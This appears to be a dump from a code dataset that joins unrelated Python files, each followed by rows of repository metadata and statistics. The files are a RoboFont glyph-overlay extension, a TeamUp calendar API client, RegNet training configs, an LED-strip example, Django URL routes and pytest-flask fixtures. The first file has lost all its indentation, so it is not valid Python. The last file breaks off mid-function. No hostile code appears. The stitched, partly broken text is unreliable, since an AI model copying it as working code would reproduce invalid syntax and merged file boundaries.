view.contextCurrent = EditText((C.C2+95, -30, 60, 20), callback=self.contextCurrentEditCallback, continuous=True, sizeStyle="small")
view.contextAfter = EditText((C.C2+165, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Right Context')
self.activateModule()
self.setUpBaseWindowBehavior()
def fontListCallback(self, sender):
u"""If there is a selection, toggle the status of these fonts."""
# Avoid recursive loop because of changing font selection
if not self._selectionChanging:
for selectedIndex in sender.getSelection():
item = sender.get()[selectedIndex]
if item['status']:
item['status'] = ''
else:
item['status'] = selectedSymbol
# If shift is held when pressing an entry in the font list,
# the non-selected fonts will swap with the current's state
if NSEvent.modifierFlags() & NSShiftKeyMask:
items = [sender.get()[i] for i in range(len(sender.get())) if i != selectedIndex]
for subItems in items:
if item['status'] == '':
subItems['status'] = selectedSymbol
else:
subItems['status'] = ''
self._selectionChanging = True
# Avoid recursive loop because of changing font selection
sender.setSelection([])
self._selectionChanging = False
self.updateView()
def canDraw(self):
return True
"""
There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
"""
#def isUpper(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Lu':
# return True
# return False
#def isLower(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Ll':
# return True
# return False
def getHiddenFont(self, path):
from builtins import str
for f in self.tool.getFonts():
if f.path == path:
return f
elif path == str(f.info.familyName)+" "+str(f.info.styleName):
return f
def drawBackground(self, info):
u"""Draw the background of defined glyphs and fonbts.
Scale is available as mouse.scale."""
view = self.getView()
if not view.viewEnabled.get():
return
fill = getExtensionDefault(self.DEFAULTKEY_FILL, True)
stroke = getExtensionDefault(self.DEFAULTKEY_STROKE, True)
fillcolor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
glyph = info.get('glyph')
if glyph is not None:
current = glyph.getParent()
else:
current = self.tool.getCurrentFont()
if glyph is None or current is None:
return
align = self.getAlignment()
# Get the fonts from the list and see if they are selected.
sourceItems = self.getSourceFonts()
showFonts = []
for item in sourceItems:
if not item['status']:
continue
path = item['path']
font = self.getHiddenFont(path)
showFonts.append(font)
if view.viewCurrent.get() and current not in showFonts:
showFonts.append(current)
for font in showFonts:
self.fillColor.setFill()
self.strokeColor.setStroke()
contextBefore, contextCurrent, contextAfter = self.getContexts()
if font is not None:
contextBefore = splitText(contextBefore, TX.naked(font).unicodeData, TX.naked(font).groups)
contextBefore = [font[gname] for gname in contextBefore if gname in font.keys()]
contextAfter = splitText(contextAfter, TX.naked(font).unicodeData, TX.naked(font).groups)
contextAfter = [font[gname] for gname in contextAfter if gname in font.keys()]
contextCurrent = splitText(contextCurrent, TX.naked(font).unicodeData, TX.naked(font).groups)
if len(contextCurrent) > 0:
contextCurrent = [font[gname] for gname in [contextCurrent[0]] if gname in font.keys()]
if len(contextCurrent) > 0:
sourceGlyph = contextCurrent[0]
else:
sourceGlyph = None
elif glyph.name in font.keys():
sourceGlyph = font[glyph.name]
else:
sourceGlyph = None
"""
#There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
if view.contextUandlc.get():
caseTransform = None
if self.isUpper(glyph):
caseTransform = FontTX.unicodes.getUpperFromLower
elif self.isLower(glyph):
caseTransform = FontTX.unicodes.getLowerFromUpper
if caseTransform:
for i, g in enumerate(contextBefore):
newG = caseTransform(g)
if newG is not None:
contextBefore[i] = newG
newG = caseTransform(sourceGlyph)
if newG is not None:
sourceGlyph = newG
if caseTransform:
for i, g in enumerate(contextAfter):
newG = caseTransform(g)
if newG is not None:
contextAfter[i] = newG
"""
scale(current.info.unitsPerEm/float(font.info.unitsPerEm))
widthOffset = 0
if sourceGlyph is not None:
if align == 'center':
destCenter = float(glyph.width/2) / current.info.unitsPerEm
sourceCenter = float(sourceGlyph.width/2) / font.info.unitsPerEm
widthOffset = (destCenter-sourceCenter) * font.info.unitsPerEm
elif align == 'right':
widthOffset = ( ( glyph.width / glyph.getParent().info.unitsPerEm ) - (sourceGlyph.width / sourceGlyph.getParent().info.unitsPerEm ) ) * font.info.unitsPerEm
translate(widthOffset, 0)
previousGlyph = sourceGlyph
contextBefore.reverse()
totalWidth = 0
for i, cbGlyph in enumerate(contextBefore):
kernValue = 0
if previousGlyph is not None and previousGlyph.getParent() == cbGlyph.getParent():
# Uncomment to activate kerning. Requires FontTX.
#kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups)
kernValue += 0
translate(-cbGlyph.width-kernValue, 0)
totalWidth += cbGlyph.width + kernValue
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
previousGlyph = cbGlyph
translate(totalWidth, 0)
totalWidth = 0
contextCurrentAndAfter = [sourceGlyph]+contextAfter
for i, cbGlyph in enumerate(contextCurrentAndAfter):
if cbGlyph is None:
cbGlyph = sourceGlyph
nextGlyph = None
if i + 1 < len(contextCurrentAndAfter):
nextGlyph = contextCurrentAndAfter[i+1]
if (i == 0 and cbGlyph == glyph) or sourceGlyph is None:
pass
else:
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
kernValue = 0
if cbGlyph is not None and nextGlyph is not None and nextGlyph.getParent() == cbGlyph.getParent():
#kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups)
# Uncomment to activate kerning. Requires FontTX.
kernValue = 0
width = 0
if cbGlyph is not None:
width = cbGlyph.width
translate(width+kernValue, 0)
totalWidth += width + kernValue
previousGlyph = cbGlyph
translate(-totalWidth, 0)
translate(-widthOffset, 0)
scale(font.info.unitsPerEm/float(current.info.unitsPerEm))
#restore()
drawInactive = drawBackground
def viewCallback(self, sender):
self.updateView()
def getSourceFonts(self):
"""
Get the fonts in the list.
"""
view = self.getView()
return view.fontList.get()
def setSourceFonts(self):
u"""
Set the font list from the current set of open fonts.
"""
view = self.getView()
labels = []
currentSelection = []
for d in self.getSourceFonts():
if d['status']:
currentSelection.append(d['path'])
for status, path, name in self.tool.getFontLabels():
if path in currentSelection:
status = selectedSymbol
else:
status = ''
labels.append(dict(status=status, path=path, name=name))
view.fontList.set(labels)
def colorCallback(self, sender):
"""
Change the color.
"""
selectedColor = sender.get()
r = selectedColor.redComponent()
g = selectedColor.greenComponent()
b = selectedColor.blueComponent()
a = 1
strokeColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(r, g, b, a)
setExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, selectedColor)
setExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, strokeColor)
self.fillColor = selectedColor
self.strokeColor = strokeColor
self.updateView()
def fillCallback(self, sender):
"""
Change the fill status.
"""
setExtensionDefault(self.DEFAULTKEY_FILL, sender.get())
self.updateView()
def strokeCallback(self, sender):
"""
Change the stroke status.
"""
setExtensionDefault(self.DEFAULTKEY_STROKE, sender.get())
self.updateView()
def alignCallback(self, sender):
"""
Change the alignment status.
"""
self.updateView()
def getAlignment(self):
"""
Get the alignment as a string.
"""
view = self.getView()
index = view.align.get()
if index == 0:
return 'left'
elif index == 1:
return 'center'
elif index == 2:
return 'right'
def updateView(self, sender=None):
UpdateCurrentGlyphView()
def windowCloseCallback(self, sender):
self.deactivateModule()
self.updateView()
BaseWindowController.windowCloseCallback(self, sender)
def getFontItems(self, update=False):
"""
Get all fonts in a way that can be set into a vanilla list.
"""
paths = set() # Set of all unique paths in the merges lists
itemsByName = {}
if update: # If update flag is set, then keep the existing selected fonts.
for item in self.getSourceFonts():
if item['status']:
itemsByName[item['name']] = item
currentStatuses = {}
if hasattr(self.getView(), 'fontList'):
for d in self.getSourceFonts():
currentStatuses[d['path']] = d['status']
for status, path, uniqueName in self.tool.getFontLabels():
if path in currentStatuses:
status = currentStatuses[path]
else:
status = selectedSymbol
            if uniqueName not in itemsByName:  # if it is not already there, add this to the list
itemsByName[uniqueName] = dict(status=status, path=path, name=uniqueName)
fontList = []
for key, item in sorted(itemsByName.items()):
fontList.append(item)
return fontList
################
# CONTEXTS
################
def getContexts(self):
if not hasattr(self, 'contextBefore'):
self.contextBefore = ''
if not hasattr(self, 'contextAfter'):
self.contextAfter = ''
if not hasattr(self, 'contextCurrent'):
self.contextCurrent = None
return self.contextBefore, self.contextCurrent, self.contextAfter
def setContexts(self, contextBefore, contextCurrent, contextAfter):
self.contextBefore = contextBefore
self.contextCurrent = contextCurrent
self.contextAfter = contextAfter
def contextEditCallback(self, sender):
before = self.getView().contextBefore.get()
current = self.getView().contextCurrent.get() or None
after = self.getView().contextAfter.get()
self.setContexts(before, current, after)
self.updateView()
def contextCurrentEditCallback(self, sender):
#if sender.get():
#sender.set(sender.get()[0])
self.contextEditCallback(sender)
if __name__ == "__main__":
OverlayUFOs() | 39.118943 | 182 | 0.575526 | 25,360 | 0.95188 | 0 | 0 | 114 | 0.004279 | 0 | 0 | 7,435 | 0.279071 |
c7ba815c300287faa117210ec887325390625523 | 114 | py | Python | nautapy/__init__.py | armandofcom/nautapy | 6907e350021752b54998f6b0b5674dccc8ca9ddd | [
"MIT"
]
| 25 | 2020-03-20T05:02:09.000Z | 2022-03-29T13:24:36.000Z | nautapy/__init__.py | armandofcom/nautapy | 6907e350021752b54998f6b0b5674dccc8ca9ddd | [
"MIT"
]
| 7 | 2020-01-22T23:10:25.000Z | 2021-06-02T21:41:27.000Z | nautapy/__init__.py | armandofcom/nautapy | 6907e350021752b54998f6b0b5674dccc8ca9ddd | [
"MIT"
]
| 14 | 2020-03-20T05:02:18.000Z | 2022-03-29T13:24:39.000Z | import os
appdata_path = os.path.expanduser("~/.local/share/nautapy")
os.makedirs(appdata_path, exist_ok=True)
| 16.285714 | 59 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.210526 |
c7bb3480194f9fe2fbc061710221cb965aa24166 | 9,368 | py | Python | pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | a398fe6808d506ca4e05090b58e0a697aa1f46e5 | [
"MIT"
]
| 5 | 2019-04-11T14:52:19.000Z | 2022-03-13T10:39:22.000Z | pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | a398fe6808d506ca4e05090b58e0a697aa1f46e5 | [
"MIT"
]
| 9 | 2019-04-11T14:49:59.000Z | 2021-11-30T08:34:31.000Z | pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | a398fe6808d506ca4e05090b58e0a697aa1f46e5 | [
"MIT"
]
| 3 | 2019-04-11T14:17:00.000Z | 2021-07-15T06:59:13.000Z | import requests
import json
import datetime
import sys
from dateutil.parser import parse as to_datetime
try:
import pandas as pd
except ImportError:
pass
from pyteamup.utils.utilities import *
from pyteamup.utils.constants import *
from pyteamup.Event import Event
class Calendar:
def __init__(self, cal_id, api_key):
self.__calendar_id = cal_id
self.__api_key = api_key
self.__cal_base = f'/{cal_id}'
self.__token_str = f'?_teamup_token={self.api_key}'
self.__subcalendars = None
self.__valid_api = None
self.__configuration = None
self._base_url = BASE_URL + self.__cal_base
self._event_collection_url = self._base_url + EVENTS_BASE + self.__token_str
self._subcalendars_url = self._base_url + SUBCALENDARS_BASE + self.__token_str
self._check_access_url = BASE_URL + CHECK_ACCESS_BASE + self.__token_str
self.events_json = None
if not self.valid_api:
raise Exception(f'Invalid Api Key: {self.api_key}')
def __str__(self):
return self.calendar_id
@property
def api_key(self):
return self.__api_key
@property
def calendar_id(self):
return self.__calendar_id
@property
def valid_api(self):
"""Makes a request to the calendar to see if the api is valid"""
if not self.__valid_api:
req = requests.get(self._check_access_url)
try:
check_status_code(req.status_code)
self.__valid_api = True
except:
self.__valid_api = False
return self.__valid_api
        else:
            # Already validated; returning None here would make repeat
            # checks of .valid_api falsely report an invalid key.
            return self.__valid_api
@property
def configuration(self):
if self.__configuration is None:
print('Fetching configuration')
req = requests.get(self._base_url + CONFIGURATION_BASE + self.__token_str)
check_status_code(req.status_code)
self.__configuration = json.loads(req.text)['configuration']
return self.__configuration
@property
def subcalendars(self):
if not self.__subcalendars:
print('Fetching Subcalendars')
req = requests.get(self._subcalendars_url)
check_status_code(req.status_code)
self.__subcalendars = json.loads(req.text)['subcalendars']
return self.__subcalendars
def clear_calendar_cache(self):
self.__subcalendars = None
self.__configuration = None
def get_event_collection(self, start_dt=None, end_dt=None, subcal_id=None, returnas='events', markdown=False):
"""
Method allows bulk fetching of events that fall between the provided time frame. If None is provided then
the current date -30 and +180 days is used.
:param start_dt: if set as None then set as today minus 30 days
:param end_dt: if left as None then set as today plus 180 days
:param subcal_id: optional str or list-like if a different calendar should be queried
:return: json of events
"""
if returnas not in ('events', 'dataframe', 'dict'):
            raise TypeError('Returnas not recognized. Recognized values: events, dataframe, dict')
if start_dt is None:
start_dt = datetime.date.today() - datetime.timedelta(30)
if end_dt is None:
end_dt = datetime.date.today() + datetime.timedelta(180)
subcal_par = ''
if subcal_id:
if isinstance(subcal_id, (list, tuple)):
for id in subcal_id:
subcal_par += f'&subcalendarId[]={id}'
else:
subcal_par = f'&subcalendarId[]={subcal_id}'
if markdown == True:
para_markdown = '&format[]=markdown'
else:
para_markdown = ''
parameters = f'&startDate={start_dt.strftime("%Y-%m-%d")}&endDate={end_dt.strftime("%Y-%m-%d")}' + subcal_par + para_markdown
req = requests.get(self._event_collection_url + parameters)
check_status_code(req.status_code)
self.events_json = json.loads(req.text)['events']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in self.events_json]
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(self.events_json)
else:
return self.events_json
def _create_event_from_json(self, payload):
""" Lazy Creation of Event by passing a formatted payload"""
resp = requests.post(self._event_collection_url, data=payload, headers=POST_HEADERS)
try:
check_status_code(resp.status_code)
except:
print(payload)
print(resp.text)
raise
return resp.text
def get_event(self, event_id, returnas='event'):
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + f'/{event_id}' + self.__token_str
resp = requests.get(url)
check_status_code(resp.status_code)
event_dict = json.loads(resp.text)['event']
if returnas == 'event':
return Event(self, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
def get_subcalendar(self):
raise NotImplementedError
def search_events(self):
raise NotImplementedError
def get_changed_events(self, modified_since, returnas='event'):
"""
Get changed events since given unix time
:param modified_since: <int> Unix timestamp, must be less than 30 days old
:param returnas: <str> `event` `series` `dict` are valid options
:return: Tuple of event list and returned timestamp
"""
        # The method body branches on 'events' and 'dataframe', so validate
        # against those values rather than 'event'/'series'.
        if returnas not in ('events', 'dataframe', 'dict'):
            raise TypeError('Returnas not recognized. Recognized values: events, dataframe, dict')
url = self._base_url + EVENTS_BASE + self.__token_str + '&modifiedSince=' + str(modified_since)
resp = requests.get(url)
check_status_code(resp.status_code)
events_json = json.loads(resp.text)['events']
timestamp = json.loads(resp.text)['timestamp']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in events_json], timestamp
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(events_json), timestamp
else:
return events_json, timestamp
def new_event(self, title, start_dt, end_dt, subcalendar_ids, all_day=False,
notes=None, location=None, who=None, remote_id=None, returnas='event'):
"""
Create a new event within a provided subcalendar. Can return as Event object, Series object, or Dictionary.
Undo_id not included with return unless returnas='event' in which case it is included with the returned Event Object
:param subcalendar_id: <str, int, or list-like> Required - the ID of the subcalendar within the calendar the event should be created in.
:param title: <str> Title of the event, must be
:param start_dt: <datetime> Start Datetime
:param end_dt: <datetime> End Datetime
:param all_day: <Bool> Allday or Not
:param notes: <str> HTML or Markdown formatted string detailing the Description
:param location: <str> Location of the event
:param who: <str>
:param remote_id: <str> Remote ID of the event, used to link the TeamUp event record to its source information
:param returnas: <str> `event` `series` `dict` are valid options
:return:
"""
if returnas not in ('event','dict','series'):
raise ValueError(f'Unrecognized returnas paramter: {returnas}')
if not isinstance(start_dt, datetime.datetime) or not isinstance(end_dt, datetime.datetime):
try:
start_dt = to_datetime(start_dt)
end_dt = to_datetime(end_dt)
except:
raise ValueError('Parse failed, please pass all dates as a datetime object')
if isinstance(subcalendar_ids, (str, int)):
subcalendar_ids = [subcalendar_ids]
if not isinstance(subcalendar_ids, (tuple, list)):
raise ValueError(f'Unrecognized Type: Subcalendar_ids type: {type(subcalendar_ids)}')
        payload = {'remote_id': remote_id,  # renamed from `dict` to avoid shadowing the builtin
                   'title': title,
                   'subcalendar_ids': subcalendar_ids,
                   'start_dt': format_date(start_dt),
                   'end_dt': format_date(end_dt),
                   'all_day': all_day,
                   'notes': notes,
                   'location': location,
                   'who': who
                   }
        resp_text = self._create_event_from_json(json.dumps(payload))
resp_dict = json.loads(resp_text)
event_dict = resp_dict['event']
undo_id = resp_dict['undo_id']
if returnas == 'event':
return Event(self, undo_id = undo_id, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
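# --- Usage sketch (not part of the original module): the calendar id and
# API key below are placeholders, so the calls are left commented.
#
#   cal = Calendar('ks5nqi2a3bcd', 'tk_example_api_key')
#   events = cal.get_event_collection(returnas='dict')
#   for ev in events:
#       print(ev['title'])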
| 39.694915 | 144 | 0.627242 | 9,102 | 0.971605 | 0 | 0 | 1,261 | 0.134607 | 0 | 0 | 2,897 | 0.309244 |
c7bd4060064aa4ccc776c07aa7678497ec65e795 | 8,232 | py | Python | configs/regnet.py | roatienza/agmax | 2a7299cc506605aeaaf64b6155b5c826c71d5786 | [
"Apache-2.0"
]
| 2 | 2021-11-05T13:09:12.000Z | 2022-03-04T05:07:33.000Z | configs/regnet.py | roatienza/agmax | 2a7299cc506605aeaaf64b6155b5c826c71d5786 | [
"Apache-2.0"
]
| 1 | 2021-11-04T10:06:57.000Z | 2021-11-07T08:35:39.000Z | configs/regnet.py | roatienza/agmax | 2a7299cc506605aeaaf64b6155b5c826c71d5786 | [
"Apache-2.0"
]
| null | null | null |
from . import constant
parameters = {
'RegNet' : { "lr": 0.1, "epochs": 100, "weight_decay": 5e-5, "batch_size": 128, "nesterov": True, "init_backbone":True, "init_extractor":True,},
}
backbone_config = {
"RegNetX002" : {"channels": 3, "dropout": 0.2,},
"RegNetY004" : {"channels": 3, "dropout": 0.2,},
}
train = {
# RegNetX002
'RegNetX002-standard': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-standard-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetX002-auto_augment-cutmix-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup-agmax': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetX002-auto_augment-cutmix': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetX002-auto_augment-mixup': { "backbone": 'RegNetX002',
"backbone_config": backbone_config['RegNetX002'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
# RegNetY004
'RegNetY004-standard': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-standard-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": False, "no_basic_augment": False, "cutmix": False, "mixup" : False,
},
'RegNetY004-auto_augment-cutmix-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup-agmax': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.agmax_weights_std,
"agmax" : True,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
'RegNetY004-auto_augment-cutmix': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": True, "mixup" : False,
},
'RegNetY004-auto_augment-mixup': { "backbone": 'RegNetY004',
"backbone_config": backbone_config['RegNetY004'],
"weights_std": constant.standard_weights_std,
"agmax" : False,
"parameters" : parameters['RegNet'],
"cutout": False, "auto_augment": True, "no_basic_augment": False, "cutmix": False, "mixup" : True,
},
}
| 68.6 | 153 | 0.409621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,627 | 0.319121 |
c7bde259829ba295ad5078b7f30b72f3fddb4e13 | 1,608 | py | Python | examples/ws2812/main.py | ivankravets/pumbaa | 2a1869cc204e3128516ed6fa9f89529aedec1702 | [
"MIT"
]
| 69 | 2016-09-04T18:36:18.000Z | 2021-07-04T21:51:54.000Z | examples/ws2812/main.py | ivankravets/pumbaa | 2a1869cc204e3128516ed6fa9f89529aedec1702 | [
"MIT"
]
| 42 | 2016-09-02T20:10:19.000Z | 2020-07-01T05:54:01.000Z | examples/ws2812/main.py | ivankravets/pumbaa | 2a1869cc204e3128516ed6fa9f89529aedec1702 | [
"MIT"
]
| 11 | 2016-09-29T14:33:23.000Z | 2021-02-28T19:30:49.000Z | #
# @section License
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2017, Erik Moqvist
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# This file is part of the Pumbaa project.
#
import board
from drivers import Ws2812
import time
PIXEL_MAX = 81
RED = PIXEL_MAX * b'\x00\xff\x00'
GREEN = PIXEL_MAX * b'\xff\x00\x00'
BLUE = PIXEL_MAX * b'\x00\x00\xff'
WS2812 = Ws2812(board.PIN_GPIO18)
while True:
print('Red.')
WS2812.write(RED)
time.sleep(0.5)
print('Green.')
WS2812.write(GREEN)
time.sleep(0.5)
print('Blue.')
WS2812.write(BLUE)
time.sleep(0.5)
| 29.236364 | 69 | 0.735075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,234 | 0.767413 |
c7be4754a949474c9764e2ad170025656a516b5f | 740 | py | Python | reports/urls.py | aysiu/manana | 8af8b57c72f6154affdb5f3a9a3469a49e5818fe | [
"Apache-2.0"
]
| 9 | 2016-02-16T23:53:40.000Z | 2020-07-13T16:04:18.000Z | reports/urls.py | aysiu/manana | 8af8b57c72f6154affdb5f3a9a3469a49e5818fe | [
"Apache-2.0"
]
| null | null | null | reports/urls.py | aysiu/manana | 8af8b57c72f6154affdb5f3a9a3469a49e5818fe | [
"Apache-2.0"
]
| 4 | 2016-02-16T23:56:13.000Z | 2019-05-20T15:12:14.000Z | from django.conf.urls import patterns, include, url
urlpatterns = patterns('reports.views',
url(r'^index/*$', 'index'),
url(r'^dashboard/*$', 'dashboard'),
url(r'^$', 'index'),
url(r'^detail/(?P<serial>[^/]+)$', 'detail'),
url(r'^detailpkg/(?P<serial>[^/]+)/(?P<manifest_name>[^/]+)$', 'detail_pkg'),
url(r'^detailmachine/(?P<serial>[^/]+)$', 'machine_detail'),
url(r'^appleupdate/(?P<serial>[^/]+)$', 'appleupdate'),
url(r'^raw/(?P<serial>[^/]+)$', 'raw'),
url(r'^submit/(?P<submission_type>[^/]+)$', 'submit'),
url(r'^warranty/(?P<serial>[^/]+)$', 'warranty'),
# for compatibilty with MunkiReport scripts
url(r'^ip$', 'lookup_ip'),
url(r'^(?P<submission_type>[^/]+)$', 'submit'),
) | 41.111111 | 81 | 0.554054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 496 | 0.67027 |
c7be660a1e99ce3791843752d3993ac9fa123bdb | 5,812 | py | Python | BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
]
| null | null | null | BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
]
| 1 | 2019-08-20T18:42:14.000Z | 2019-08-20T18:42:14.000Z | BackEnd/venv/lib/python3.8/site-packages/pytest_flask/fixtures.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
]
| 1 | 2019-08-20T18:11:48.000Z | 2019-08-20T18:11:48.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import multiprocessing
import pytest
import socket
import signal
import os
import logging
try:
from urllib2 import URLError, urlopen
except ImportError:
from urllib.error import URLError
from urllib.request import urlopen
from flask import _request_ctx_stack
@pytest.yield_fixture
def client(app):
"""A Flask test client. An instance of :class:`flask.testing.TestClient`
by default.
"""
with app.test_client() as client:
yield client
@pytest.fixture
def client_class(request, client):
"""Uses to set a ``client`` class attribute to current Flask test client::
@pytest.mark.usefixtures('client_class')
class TestView:
def login(self, email, password):
credentials = {'email': email, 'password': password}
return self.client.post(url_for('login'), data=credentials)
def test_login(self):
assert self.login('[email protected]', 'pass').status_code == 200
"""
if request.cls is not None:
request.cls.client = client
class LiveServer(object):
"""The helper class uses to manage live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
"""
def __init__(self, app, host, port, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker,
args=(self.app, self.host, self.port)
)
self._process.start()
# We must wait for the server to start listening with a maximum
# timeout of 5 seconds.
timeout = 5
while timeout > 0:
time.sleep(1)
try:
urlopen(self.url())
timeout = 0
except URLError:
timeout -= 1
def url(self, url=''):
"""Returns the complete url based on server options."""
return 'http://%s:%d%s' % (self.host, self.port, url)
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error('Failed to join the live server process: %r', ex)
return False
def __repr__(self):
return '<LiveServer listening at %s>' % self.url()
def _rewrite_server_name(server_name, new_port):
"""Rewrite server port in ``server_name`` with ``new_port`` value."""
